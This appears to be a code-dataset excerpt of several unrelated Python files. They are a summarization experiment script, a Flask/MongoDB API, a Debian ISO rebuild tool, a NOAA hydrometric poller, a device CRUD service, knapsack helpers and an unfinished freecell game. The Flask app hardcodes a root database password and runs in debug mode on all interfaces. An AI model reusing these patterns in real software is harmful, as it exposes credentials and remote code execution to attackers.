outputs[f'rouge_{rouge_type.lower()}_precision']\n stats[f'{prefix}rouge{rouge_type}_recall'] = outputs[f'rouge_{rouge_type.lower()}_recall']\n stats[f'{prefix}rouge{rouge_type}_f1'] = fscore\n f1s.append(fscore)\n stats[f'{prefix}mean_f1'] = np.array(f1s).mean()\n return stats\n\n\ndef get_alignments(source_toks, summary, nlp):\n sum_sents = convert_to_sents(summary, nlp)\n sum_sents_tok = [[str(token.text) for token in sentence] for sentence in sum_sents]\n aligned_sents = list(map(lambda x: gain_selection(source_toks, [x], 3, lower=False, sort=False)[0], sum_sents_tok))\n aligned_sents_flat = list(set(list(itertools.chain(*aligned_sents))))\n return aligned_sents, aligned_sents_flat\n\n\ndef get_idx(idx_str):\n idxs = idx_str.split(',')\n return list(map(int, idxs))\n\n\ndef get_priority(source_toks, summary, nlp):\n sum_sents = convert_to_sents(summary, nlp)\n sum_sents_tok = [[str(token.text) for token in sentence] for sentence in sum_sents]\n gs = gain_selection(source_toks, sum_sents_tok, summary_size=0)\n sent_r1s = list(map(lambda x: float(x), gs[2].split(',')))\n sent_r2s = list(map(lambda x: float(x), gs[3].split(',')))\n assert len(sent_r1s) == len(source_toks)\n avg_rs = np.array([(a + b) / 2.0 for (a, b) in zip(sent_r1s, sent_r2s)])\n return np.argsort(- avg_rs), avg_rs\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Mask Cross Attention and Generate')\n\n parser.add_argument('--extractor', default='extract', choices=['oracle', 'extract'])\n parser.add_argument('--gpu_device', default=1, type=int)\n parser.add_argument('--data_dir', default='/nlp/projects/faithsum')\n parser.add_argument('--wandb_name', default='score_abstract_kld')\n parser.add_argument('-debug', default=False, action='store_true')\n parser.add_argument('--hf_model', default='facebook/bart-base')\n parser.add_argument('--max_examples', default=1000, type=int)\n parser.add_argument('--k', default=10, type=int)\n\n args = parser.parse_args()\n\n oracle_df = pd.read_csv(os.path.join(args.data_dir, 'cnn_dailymail/oracle/validation_v2.csv'))\n results_dir = os.path.join(args.data_dir, 'results', args.wandb_name)\n outputs = pd.read_csv(os.path.join(results_dir, 'validation_beam_outputs.csv'))\n n = len(outputs)\n if n > args.max_examples:\n outputs = outputs.sample(n=args.max_examples, replace=False, random_state=1992)\n nlp = spacy.load('en_core_web_sm')\n\n dataset = load_dataset('cnn_dailymail', '3.0.0')['validation']\n dataset_idx2id = dataset['id']\n orig_sources = dataset['article']\n\n ids2oracles = {row['id']: row for row in oracle_df.to_dict('records')}\n records = outputs.to_dict('records')\n weight_dir = os.path.join(args.data_dir, 'weights')\n\n ckpt_path = get_path_from_exp(weight_dir, args.wandb_name)\n tokenizer_dir = os.path.join(weight_dir, args.wandb_name, 'tokenizer')\n print(f'Loading tokenizer from {tokenizer_dir}...')\n tokenizer = AutoTokenizer.from_pretrained(pretrained_model_name_or_path=tokenizer_dir)\n\n additional_ids = tokenizer.additional_special_tokens_ids\n special_id_min = 999999 if len(additional_ids) == 0 else min(tokenizer.additional_special_tokens_ids)\n\n print(f'Loading model from {ckpt_path}...')\n model = TransformerSummarizer.load_from_checkpoint(\n checkpoint_path=ckpt_path, tokenizer=tokenizer, hf_model=args.hf_model, strict=False).to(args.gpu_device).eval()\n\n rouge_metric = RougeMetric()\n n = len(records)\n sample_out = []\n rank_dataset = []\n for record in tqdm(records, total=n):\n oracle_obj = ids2oracles[dataset_idx2id[record['dataset_idx']]]\n source = orig_sources[record['dataset_idx']]\n source_sents = convert_to_sents(source, nlp)\n n = len(source_sents)\n\n sent_scores = np.array(list(map(float, record['sent_scores'].split(','))))\n num_trunc_sent = len(sent_scores) # Up to 1024 tokens usually sometimes reduces number of sentences\n assert num_trunc_sent <= len(source_sents)\n source_sents = source_sents[:num_trunc_sent]\n\n rank_example = {\n 'dataset_idx': record['dataset_idx'],\n 'source_sents': [str(x) for x in source_sents],\n 'reference': record['reference'],\n 'abstract': record['abstract'],\n 'priority': {\n 'prob': [],\n 'source_idxs': []\n },\n 'sampled': {\n 'source_idxs': [],\n 'scores': [],\n 'extracts': [],\n 'abstracts': [],\n }\n }\n\n source_annotated = ''.join([f' {s}' for i, s in enumerate(source_sents)])\n # Get source tokens\n source_sents_tok = [[str(token.text) for token in sentence] for sentence in source_sents]\n pred_abstract = record['abstract']\n reference = record['reference']\n\n extract_priority = (-sent_scores).argsort()\n extract_scores = sent_scores[extract_priority]\n extract_scores_norm = expit(extract_scores)\n # extract_scores_norm[extract_scores_norm < 0.1] = 0.0\n # emin, emax = extract_scores_norm.min(), extract_scores_norm.max()\n # extract_scores_norm = (extract_scores_norm - emin) / (emax - emin)\n oracle_priority, oracle_scores = get_priority(source_sents_tok, reference, nlp)\n\n if args.extractor == 'extract':\n priority = extract_priority\n elif args.extractor == 'oracle':\n priority = oracle_priority\n\n inputs = tokenizer(\n [source_annotated],\n padding='longest',\n truncation=True,\n max_length=1024,\n return_tensors='pt',\n )\n input_ids = inputs['input_ids'].to(args.gpu_device)\n attention_mask = inputs['attention_mask'].to(args.gpu_device)\n cls_mask = input_ids >= special_id_min\n\n idxs = []\n masks = []\n for exp in range(args.k):\n unmask_idxs = []\n for source_idx in range(len(extract_scores_norm)):\n should_select = np.random.random() <= extract_scores_norm[source_idx]\n if should_select:\n unmask_idxs.append(extract_priority[source_idx])\n idxs.append(unmask_idxs)\n masks.append(sentence_mask(cls_mask, unmask_idxs, attention_mask))\n\n sampled_extracts = [''.join('' + str(source_sents[i]) for i in idx) for idx in idxs]\n all_masks = torch.cat(masks)\n num_cand = len(all_masks)\n input_ids_rep = input_ids.repeat(num_cand, 1)\n kwargs = {\n 'input_ids': input_ids_rep,\n 'attention_mask': all_masks,\n 'num_return_sequences': 1,\n 'num_beams': 4,\n 'length_penalty': 4.0,\n 'max_length': 142,\n 'min_length': 56,\n 'no_repeat_ngram_size': 3,\n 'early_stopping': True,\n }\n\n pred_ids = model.model.generate(**kwargs)\n pred_str = tokenizer.batch_decode(pred_ids.tolist(), skip_special_tokens=True)\n\n rank_example['priority']['prob'] = list(extract_scores_norm)\n rank_example['priority']['source_idxs'] = list(extract_priority)\n rank_example['sampled']['source_idxs'] = idxs\n rank_example['sampled']['abstracts'] = pred_str\n rank_example['sampled']['extracts'] = sampled_extracts\n\n rouges = []\n r1s = []\n for idx, x in enumerate(pred_str):\n rr = compute_rouge([x], [reference], rouge_metric)\n rank_example['sampled']['scores'].append(rr)\n rouges.append(rr)\n r1s.append(rr['rouge1_f1'])\n best_idx = np.argmax(r1s)\n best_input = list(map(str, idxs[best_idx]))\n num_source_sent = len(best_input)\n rouge_df = pd.DataFrame(rouges)\n cols = ['rouge1_f1', 'rouge2_f1', 'rougeL_f1']\n row = {\n 'best_num_source_sents': num_source_sent, 'best_source_sent_idxs': ','.join(best_input),\n 'num_source_sents': num_trunc_sent,\n 'sent_compression': num_trunc_sent / num_source_sent\n }\n for col in cols:\n row[f'{col}_avg'] = rouge_df[col].mean()\n row[f'{col}_max'] = rouge_df[col].max()\n row[f'{col}_min'] = rouge_df[col].min()\n sample_out.append(row)\n rank_dataset.append(rank_example)\n\n sample_out = pd.DataFrame(sample_out)\n for col in list(sample_out.columns):\n try:\n print(col, sample_out[col].dropna().mean())\n except:\n print(col, ' not a valid column to average')\n\n out_fn = os.path.join(results_dir, f'{args.extractor}_sampled.csv')\n print(f'Saving to {out_fn}')\n sample_out.to_csv(out_fn, index=False)\n\n out_fn = os.path.join(results_dir, 'sample_dataset.json')\n print(f'Saving Rank dataset to {out_fn}...')\n with open(out_fn, 'w') as fd:\n ujson.dump(out_fn, fd)\n","repo_name":"griff4692/faith-sum","sub_path":"gen_transformers/deprecated/sample_generate.py","file_name":"sample_generate.py","file_ext":"py","file_size_in_byte":10033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71046966314","text":"import os\nfrom flask import Flask, redirect, url_for, request, render_template, jsonify\nfrom pymongo import MongoClient\nfrom json import loads, dumps\nfrom bson import json_util\n\napp = Flask(__name__)\nclient = MongoClient(\n os.environ['DB_PORT_27017_TCP_ADDR'],\n 27017,username='root',password='rootpassword')\ndb = client[\"dbproyecto1\"]\nmycol= db[\"publicaciones\"]\n\n@app.route('/')\ndef home():\n return \"

    API SERVIDOR A

    \"\n\n@app.route('/memoria')\ndef memoria():\n arry =os.popen('cat /proc/memoria_200915609').read()\n memoria = loads(arry)\n return memoria\n@app.route('/cpu')\ndef cpu():\n arry = os.popen('cat /proc/cpu_200915609').read()\n cpu = loads(arry)\n return cpu \n \n\n\n@app.route('/items')\ndef items():\n \n _items = mycol.find()\n items = [item for item in _items]\n lista = dumps(items,default=json_util.default)\n return lista\n \n@app.route('/new', methods=['POST'])\ndef new():\n data = request.get_json()\n #print(data['autor'],flush=True)\n item_doc = {\n \"autor\": data['autor'],\n \"nota\": data['nota']\n } \n x = mycol.insert_one(item_doc)\n return str(x.inserted_id)\n@app.route('/count')\ndef contador():\n _items = mycol.find()\n items_count={\"cantidad \": _items.count()}\n return loads(dumps(items_count))\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=80, debug=True)\n","repo_name":"Gary-Joan/Proyecto1_SOPES1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10431103764","text":"SPARK_PRESEED_FILE = \"file=/cdrom/preseed/spark.sk\"\nAPPEND = \"auto=true priority=critical net.ifnames=0 =5\"\n#-------------------------------------------------------------------------------\nGRUB_TEMPLATE = \"\"\"###\nif loadfont $prefix/font.pf2 ; then\n\tset gfxmode=800x600\n\tset gfxpayload=keep\n\tinsmod efi_gop\n\tinsmod efi_uga\n\tinsmod video_bochs\n\tinsmod video_cirrus\n\tinsmod gfxterm\n\tinsmod png\n\tterminal_output gfxterm\nfi\n\nif background_image /isolinux/splash.png; then\n\tset color_normal=light-gray/black\n\tset color_highlight=white/black\nelif background_image /splash.png; then\n\tset color_normal=light-gray/black\n\tset color_highlight=white/black\nelse\n\tset menu_color_normal=cyan/blue\n\tset menu_color_highlight=white/blue\nfi\n\n#insmod play\n#play 960 440 1 0 4 440 1\nset theme=/boot/grub/theme/1\n\ninsmod keystatus\nif keystatus --shift; then\n\tset timeout=20\nelse\n\tset timeout=5\nfi\n\nset default=0\nmenuentry --hotkey=a 'Automated install' {{\n\tset background_color=black\n\tlinux /install.amd/vmlinuz {APPEND} {PRESEED_FILE} vga=788 --- quiet\n\tinitrd /install.amd/gtk/initrd.gz\n}}\"\"\"\n\n#-------------------------------------------------------------------------------\nISOLINUX_TEMPLATE = \"\"\"###\npath\ndefault vesamenu.c32\nprompt 0\ntimeout 50\n\nmenu hshift 4\nmenu width 70\nmenu title Debian GNU/Linux installer menu (BIOS mode)\nmenu background splash.png\nmenu color title\t* #FFFFFFFF *\nmenu color border\t* #00000000 #00000000 none\nmenu color sel\t\t* #ffffffff #76a1d0ff *\nmenu color hotsel\t1;7;37;40 #ffffffff #76a1d0ff *\nmenu color tabmsg\t* #ffffffff #00000000 *\nmenu color help\t\t37;40 #ffdddd00 #00000000 none\nmenu vshift 8\nmenu rows 12\n\nlabel autoinstall\n\tmenu default\n\tmenu label ^Automated install\n\tkernel /install.amd/vmlinuz\n\tappend {APPEND} {PRESEED_FILE} vga=788 initrd=/install.amd/gtk/initrd.gz --- quiet \"\"\"\n#-------------------------------------------------------------------------------\n\nUDISKSCTL_MOUNT_CMD = \"udisksctl loop-setup -r -f {0}\"\nUDISKSCTL_UNMOUNT_CMD = \"udisksctl unmount -b {0}p1\"\nUDISKSCTL_INFO_CMD = \"udisksctl info -b {0}p1\"\nOS_XORRISO_CMD = \"\"\"\nxorriso -as mkisofs\\\n -r -checksum_algorithm_iso md5,sha1,sha256,sha512\\\n -V \"{0}\" -o {1}\\\n -J -joliet-long -cache-inodes\\\n -isohybrid-mbr {2} -b isolinux/isolinux.bin -c isolinux/boot.cat\\\n -boot-load-size 4 -boot-info-table -no-emul-boot -eltorito-alt-boot -e boot/grub/efi.img -no-emul-boot\\\n -isohybrid-gpt-basdat -isohybrid-apm-hfsplus {3} {4}\n\"\"\"\n# -quiet\n#-------------------------------------------------------------------------------\n#import re\nimport os\nimport subprocess\n\n\nclass IsoImageBuilder:\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.loop = None\n\t\tself.process = None\n\t\tself.exitcode = None\n\n\tdef get_iso_label(self, source_iso_file):\n\t\tf = open(source_iso_file,'rb')\n\t\tf.seek(0x8028, 0) #from the begin Hexadecimal 0X8028 = 32808\n\t\tiso_label = (f.read(32).decode(\"utf-8\").strip())\n\t\tf.close()\n\t\treturn iso_label\n\n\tdef __execute(self, cmd=None):\n\t\tif cmd != None and self.process == None:\n\t\t\tself.process = subprocess.Popen(['sh', cmd],stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\t\t\treturn self.process\n\t\telse:\n\t\t\treturn None\n\n\tdef __os_execute_cmd(self, cmd):\n\t\tos_stream = os.popen(cmd)\n\t\tos_output = os_stream.read()\n\t\treturn os_output\n\n\tdef __iso_mount(self, source_iso_file):\n\t\t\tself.__iso_unmount()\n\t\t\tmount_output_cmd = self.__os_execute_cmd(UDISKSCTL_MOUNT_CMD.format(source_iso_file))\n\t\t\tthislist = mount_output_cmd.split()\n\t\t\tif 'Mapped' in thislist:\n\t\t\t\tself.loop = (thislist[-1].replace('.', ''))\n\t\t\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\t\t\tlabel.set_text(f'mount {self.loop} Ok')\n\t\t\tself.log.debug('mount', self.loop)\n\n\tdef __get_mount_path(self):\n\t\tif self.loop != None:\n\t\t\tinfo_output_cmd = self.__os_execute_cmd(UDISKSCTL_INFO_CMD.format(self.loop))\n\t\t\tthislist = []\n\t\t\tfor text in info_output_cmd.splitlines():\n\t\t\t\tif 'MountPoints:' in text:\n\t\t\t\t\ttemplist = text.split()\n\t\t\t\t\ttemplist.remove('MountPoints:')\n\t\t\t\t\tthislist += templist\n\t\t\t\t\tbreak\n\t\t\treturn (\" \".join(thislist).replace(\" \", \"\\ \"))\n\n\tdef __iso_unmount(self):\n\t\tif self.loop != None:\n\t\t\tunmount_output_cmd = self.__os_execute_cmd(UDISKSCTL_UNMOUNT_CMD.format(self.loop))\n\t\t\tif 'Unmounted' in unmount_output_cmd.split():\n\t\t\t\tself.log.debug('unmount', self.loop)\n\t\t\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\t\t\tlabel.set_text(f'unmount {self.loop} Ok')\n\t\t\t\tself.loop = None\n\n\tdef __mbr_dump(self, source_iso_file):\n\t\twith open(source_iso_file, 'rb') as rb, open(f\"{self.settings.WORK_DIR}/isohdpfx.bin\", 'wb') as wb:\n\t\t\tisohdpfx = rb.read(432)\n\t\t\twb.write(isohdpfx)\n\t\t\trb.close()\n\t\t\twb.close()\n\n\tdef __write_boot_config_files(self):\n\t\tnew_append = APPEND\n\t\twith open(self.settings.GRUB_FILE, 'w') as w_grub, open(self.settings.ISOLINUX_FILE , 'w') as w_isolinux:\n\t\t\tw_grub.write(GRUB_TEMPLATE.format(APPEND=new_append, PRESEED_FILE=SPARK_PRESEED_FILE))\n\t\t\tw_isolinux.write(ISOLINUX_TEMPLATE.format(APPEND=new_append, PRESEED_FILE=SPARK_PRESEED_FILE))\n\t\t\tw_grub.close()\n\t\t\tw_isolinux.close()\n\n\tdef __run_xorriso(self, source_iso_file, output_iso_file_name):\n\t\t#mount_point = '/media/$USER/'+iso_label.replace(\" \", \"\\ \")\n\t\tmount_point = self.__get_mount_path()\n\t\tiso_label = self.get_iso_label(source_iso_file)\n\t\tpretty_label = iso_label.strip()\n\t\tcmd = OS_XORRISO_CMD.format(pretty_label, output_iso_file_name, f\"{self.settings.WORK_DIR}/isohdpfx.bin\", mount_point, self.settings.CD_ROOT_DIR)\n\t\tself.log.debug(cmd)\n#\t\tself.__os_execute_cmd(cmd)\n\n\t\twith open(f\"{self.settings.WORK_DIR}/xorriso.sh\", 'w') as script:\n\t\t\tscript.write(cmd)\n\t\t\tscript.close()\n\n\t\tcmd = f\"{self.settings.WORK_DIR}/xorriso.sh\"\n\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\tprogressbar = self.widgets_object_dict.get('progressbar_rebuild_progressbar')\n\n\t\tprocess = self.__execute(cmd)\n\t\tfor line in iter(process.stdout.readline, ''):\n\t\t\tdata = line.decode().split()\n\t\t\tif \"done\" in data or \"done,\" in data:\n\t\t\t\tstdout_text = ' '.join(data[2:6]).strip(',')\n\t\t\t\tstdout_progres = (' '.join(data[4:5]).strip('%'))\n\t\t\t\tprogressbar.set_fraction(float(stdout_progres[:-2])/ 100)\n\t\t\t\tlabel.set_text(stdout_text)\n\t\t\tif process.poll() is not None:\n\t\t\t\trc = process.returncode\n\t\t\t\tif rc == 0:\n\t\t\t\t\tself.exitcode = rc\n\t\t\t\t\tself.process = None\n\t\t\t\t\tprogressbar.set_fraction(1)\n\t\t\t\t\tlabel.set_text('Completeed')\n\t\t\t\telse:\n\t\t\t\t\tself.exitcode = rc\n\t\t\t\tbreak\n\n\tdef __cleen_up_file(self):\n\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\tlabel.set_text('Cleen up...')\n\t\tcleen_up_file = (\"isohdpfx.bin\", \"xorriso.sh\",)\n\t\tfor f in cleen_up_file:\n\t\t\tif os.path.exists(f\"{self.settings.WORK_DIR}/{f}\"):\n\t\t\t\tos.remove(f\"{self.settings.WORK_DIR}/{f}\")\n\n\tdef make_new_image(self, source_iso_file, output_iso_file_name):\n\t\tself.__write_boot_config_files()\n\t\tself.__mbr_dump(source_iso_file)\n\t\tself.__iso_mount(source_iso_file)\n\t\tos.sync()\n\t\tself.__run_xorriso(source_iso_file, output_iso_file_name)\n\t\tos.sync()\n\t\tself.__iso_unmount()\n\t\tself.__cleen_up_file()\n\n\n\n\n\n","repo_name":"Gharib24/spark","sub_path":"spark/sparkhandlers/iso_image_builder.py","file_name":"iso_image_builder.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"39980646082","text":"\"\"\"\nPosts updated files of NOAA water level/temperature hydrometric data. Station site IDs provided\nin the poll_noaa_stn_file. Compatible with Python 3.5+.\n\nusage:\nsample url: https://tidesandcurrents.noaa.gov/api/datagetter?range=1&station=9450460&product=water_temperature&units=metric&time_zone=gmt&application=web_services&format=csv\n\nin an sr_poll configuration file::\n\n\tpollUrl http://tidesandcurrents.noaa.gov/api\n retrievePathPattern /datagetter?range=1&station={0:}&product={1:}&units=metric&time_zone=gmt&application=web_services&format=csv\n\n\tpoll_noaa_stn_file [path/to/stn/file]\n\tcallback noaa_hydrometric\n\nsample station file::\n\n 7|70678|9751639|Charlotte Amalie|US|VI|-4.0\n 7|70614|9440083|Vancouver|US|WA|-8.0\n\nThe poll:\nIf poll_noaa_stn_file isn't set, it'll grab an up-to-date version of all station site code data from the \nNOAA website. The station list file is in the following format:\nSourceID | SiteID | SiteCode | SiteName | CountryID | StateID | UTCOffset\nEach station on its own line.\nPosts the file on the exchange if the request returns a valid URL. \n\nin v2, one needed a matching downloader plugin, but in sr3 we can leverage the retrievePath feature\nso that normalk downloader works, so only the poll one needed.\n\n\"\"\"\n\nimport copy\nimport datetime\nimport logging\n\nimport os\nimport sarracenia\nfrom sarracenia.flowcb import FlowCB\nimport urllib.request\nimport xml.etree.ElementTree as ET\n\nlogger = logging.getLogger(__name__)\n\n\nclass Noaa_hydrometric(FlowCB):\n def __init__(self, options):\n\n super().__init__(options,logger)\n\n # these options are only for the poll.\n self.o.add_option(option='poll_noaa_stn_file', kind='str')\n self.o.add_option( option='retrievePathPattern', kind='str', \\\n default_value='datagetter?range=1&station={0:}&product={1:}&units=metric&time_zone=gmt&application=web_services&format=csv' )\n\n if self.o.identity_method.startswith('cod,'):\n m, v = self.o.identity_method.split(',')\n self.identity = {'method': m, 'value': v}\n\n def poll(self) -> list:\n\n # Make list of site codes to pass to http get request\n sitecodes = []\n if hasattr(self.o, 'poll_noaa_stn_file'):\n stn_file = self.o.poll_noaa_stn_file\n\n # Parse file to make list of all site codes\n try:\n with open(stn_file) as f:\n for line in f:\n items = line.split('|')\n sitecodes.append(items[2])\n logger.info(\"poll_noaa used stn_file %s\" % stn_file)\n\n except IOError as e:\n logger.error(\"poll_noaa couldn't open stn file: %s\" % stn_file)\n\n else:\n # Grab station site codes from https://opendap.co-ops.nos.noaa.gov/stations/stationsXML.jsp\n tree = ET.parse(urllib.request.urlopen\\\n ('https://opendap.co-ops.nos.noaa.gov/stations/stationsXML.jsp'))\n root = tree.getroot()\n for child in root:\n sitecodes.append(child.attrib['ID'])\n\n incoming_message_list = []\n # Every hour, form the link of water level/temp data to post\n for site in sitecodes:\n\n retrievePath = self.o.retrievePathPattern.format(site, 'water_temperature')\n url = self.o.pollUrl + retrievePath\n logger.info(f'polling {site}, polling: {url}')\n # Water temp request\n resp = urllib.request.urlopen(url).getcode()\n logger.info(f\"poll_noaa file posted: {url} %s\")\n mtime = datetime.datetime.utcnow().strftime('%Y%m%d_%H%M')\n\n fname = f'noaa_{mtime}_{site}_WT.csv'\n m = sarracenia.Message.fromFileInfo(fname, self.o)\n m['identity'] = self.identity\n m['retrievePath'] = retrievePath\n m['new_file'] = fname\n\n incoming_message_list.append(m)\n\n # Water level request\n retrievePath = self.o.retrievePathPattern.format(\n site, 'water_level') + '&datum=STND'\n url = self.o.pollUrl + retrievePath\n resp = urllib.request.urlopen(url).getcode()\n logger.info(f\"poll_noaa file posted: {url}\")\n\n fname = f'noaa_{mtime}_{site}_WL.csv'\n m = sarracenia.Message.fromFileInfo(fname, self.o)\n m['identity'] = self.identity\n m['retrievePath'] = retrievePath\n m['new_file'] = fname\n\n incoming_message_list.append(m)\n\n return incoming_message_list\n","repo_name":"MetPX/sarracenia","sub_path":"sarracenia/flowcb/poll/noaa_hydrometric.py","file_name":"noaa_hydrometric.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"72"} +{"seq_id":"9968628030","text":"import traceback\nfrom datetime import datetime\nfrom flask_jwt_extended import current_user\n\nfrom model.db_base import db\nfrom model.model_import import Device, Company, User\n\nfrom util.logger import logger\n\n\ndef read_device(**kwargs):\n logger.info('Get device list')\n logger.info(f'Filter: {kwargs}')\n try:\n condition = {k: v for k, v in kwargs.items() if v is not None}\n query = db.session.query(Device).filter_by(**condition).all()\n return query\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n\n\ndef create_device(**kwargs):\n logger.info('Register new device')\n now = datetime.utcnow()\n try:\n query = Device.query.filter_by(serial=kwargs.get('serial')).first()\n if query is not None:\n logger.error(\"Device already exists\")\n return {'message': 'Device already exists'}, 409\n\n company = db.session.query(Company).filter_by(name=kwargs.get('company')).one()\n owner = db.session.query(User).filter_by(userid=kwargs.get('owner')).one()\n device = Device(\n model=kwargs.get('model'),\n serial=kwargs.get('serial'),\n company=company,\n owner=owner,\n ip=kwargs.get('ip'),\n created=now,\n created_by=kwargs.get('created_by', current_user),\n last_edited=now,\n edited_by=kwargs.get('edited_by', current_user),\n is_deleted=False\n )\n db.session.add(device)\n db.session.commit()\n return {'message': f'Posted device<{kwargs.get(\"serial\")}> to db.'}, 201\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n\n\ndef update_device(**kwargs):\n logger.info('Update existing device')\n now = datetime.utcnow()\n try:\n query = db.session.query(Device).filter_by(serial=kwargs.get('serial')).one()\n if kwargs.get('newserial'):\n query.serial = kwargs.get('newserial')\n if kwargs.get('model'):\n query.model = kwargs.get('model')\n if kwargs.get('company'):\n query.company = db.session.query(Company).filter_by(name=kwargs.get('company')).one()\n if kwargs.get('ip'):\n query.ip = kwargs.get('ip')\n if kwargs.get('owner'):\n query.owner = db.session.query(User).filter_by(userid=kwargs.get('owner')).one()\n query.edited = now\n query.edited_by = current_user\n db.session.commit()\n return {'message': f'Updated device<{query.serial}> from db.'}, 200\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n\n\ndef delete_device(**kwargs):\n logger.info('Delete existing device')\n try:\n query = db.session.query(Device).filter_by(**kwargs).one()\n db.session.delete(query)\n db.session.commit()\n return {'message': f'Deleted device<{query.serial}> from db.'}, 200\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n","repo_name":"illo-Co-Ltd/cms","sub_path":"flask/service/data/device_service.py","file_name":"device_service.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41006208575","text":"import random\nimport numpy as np\nfrom constants import *\n\n\ndef get_random_indexes_from_array(array, number_of_indexes_to_pick):\n already_picked_indexes = np.full(number_of_indexes_to_pick, -1)\n random_indexes = np.full(number_of_indexes_to_pick, -1)\n iterator = 0\n while iterator < number_of_indexes_to_pick:\n picked_index = int(random.randrange(0, len(array)))\n if picked_index not in already_picked_indexes:\n random_indexes[iterator] = picked_index\n already_picked_indexes[iterator] = picked_index\n iterator += 1\n return random_indexes\n\n\ndef get_values_array(value_to_sketch):\n return {\n 'crossover_rate': CROSSOVER_RATES,\n 'mutation_rate': MUTATION_RATES,\n 'tournament_size': TOURNAMENT_SIZES,\n 'population_size': POPULATION_SIZES\n }[value_to_sketch]\n","repo_name":"patrykszwed/itai","sub_path":"KnapsackProblem/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"73470471594","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*\n\n\"\"\"\nDescribe a freecell game\n\"\"\"\n\nRED = [\"H\", \"D\"]\nBLACK = [\"S\", \"C\"]\nSUITS = RED + BLACK\nCARD_VALUE = [\"a\", 2, 3, 4, 5, 6, 7, 8, 9, 10, \"j\", \"q\", \"k\"]\nFREECELL = 4\nCOLUMN = 8\nCOL_BASE = \"B\"\nCOL_FC = \"FC\"\n\nclass Card(object):\n def __init__(self, suit, num):\n if num < 1 or num > len(CARD_VALUE):\n raise ValueError(\"Incorrect card number\")\n if suit not in SUITS:\n raise ValueError(\"Incorrect suit\")\n \n self.num = num\n self.suit = suit\n self.name = \"%s%s\" % (str(CARD_VALUE[num-1]), suit)\n\n self.is_red = suit in RED\n self.uid = (num << 2) + SUITS.index(suit)\n \n def __eq__(self, other):\n if isinstance(other, Card):\n return self.uid == other.uid\n return False\n\n def __hash__(self):\n return self.uid\n\nDECK = [Card(j, i) for i in range(1, len(CARD_VALUE)+1) for j in SUITS]\n\nclass FCBoard(object):\n def __init__(self, freecells, bases, columns):\n self.freecells = freecells # list[4]\n self.bases = bases # dict {suit: [cards]}\n self.columns = columns # list[8][cards]\n \n def clone(self):\n f = list(self.freecells)\n b = dict((k, list(self.bases.get(k))) for k in SUITS)\n c = [list(self.columns[i]) for i in range(COLUMN)]\n return FCBoard(f, b, c)\n \n def is_won(self):\n return sum([len(self.bases.get(k)) for k in SUITS]) == 52\n\n def apply(self, choice):\n c0 = choice.cards[0]\n\n # From origin\n if choice.col_orig == COL_FC:\n self.freecells.remove(c0)\n elif choice.col_orig == COL_BASE:\n self.bases.get(c0.suit).remove(c0)\n else:\n for _ in choice.cards:\n self.columns[choice.col_orig].pop()\n \n # To dest\n if choice.col_dest == COL_BASE:\n self.bases.get(c0.suit).append(c0)\n elif choice.col_dest == COL_FC:\n self.freecells.append(c0)\n else:\n self.columns[choice.col_dest].extend(choice.cards)\n \n @classmethod\n def init_from_deck(cls, deck):\n columns = [[] for _ in range(0, COLUMN)]\n i = 0\n for c in deck:\n columns[i].append(c)\n i = i+1 if i < COLUMN-1 else 0\n \n return cls([], dict((k, []) for k in SUITS), columns)\n \n def compute_hash(self):\n fc_bits = 0\n for c in self.freecells:\n fc_bits += 1 << c.uid\n \n cols = []\n for i in range(COLUMN):\n col_bits = 0\n j = 0\n for c in self.columns[i]:\n col_bits += c.uid << (j*6)\n j += 1\n cols.append(col_bits)\n cols.sort()\n\n return (fc_bits, *cols)\n \n \nclass Choice(object):\n def __init__(self, cards, col_orig, col_dest):\n self.cards = cards\n self.col_orig = col_orig\n self.col_dest = col_dest\n\n self.weight = 0\n \n def get_reverse(self):\n return Choice(self.cards, self.col_dest, self.col_orig)\n \n def compute_hash(self, fcboard):\n cards_bit = 0\n for c in self.cards:\n cards_bit += 1 << c.uid\n \n orig_bit = 0\n if self.col_orig == COL_FC:\n orig_bit = 2\n else:\n i = 0\n for c in fcboard.columns[self.col_orig][:-len(self.cards)]:\n orig_bit += c.uid << (i*6)\n i += 1\n \n dest_bit = 0\n if self.col_dest == COL_BASE:\n dest_bit = 1\n elif self.col_dest == COL_FC:\n dest_bit = 2\n else:\n i = 0\n for c in fcboard.columns[self.col_dest]:\n dest_bit += c.uid << (i*6)\n i += 1\n \n if dest_bit > orig_bit:\n return (cards_bit, dest_bit, orig_bit)\n else:\n return (cards_bit, orig_bit, dest_bit)\n \n def equals(self, other):\n return other.cards == self.cards and other.col_orig == self.col_orig and other.col_dest == self.col_dest\n\n\nclass FCGame(object):\n def __init__(self, fcboard):\n self.fcboard = fcboard\n\n # pre-compute columns serie, to not compute them every time!\n self._column_series = [self._get_column_series(i) for i in range(COLUMN)]\n self._last_max_mvt = 0\n \n def _get_column_series(self, col_id):\n col = self.fcboard.columns[col_id]\n serie = []\n last_card = None\n for card in reversed(col):\n # End serie if last card doesn't match\n if last_card is not None:\n if 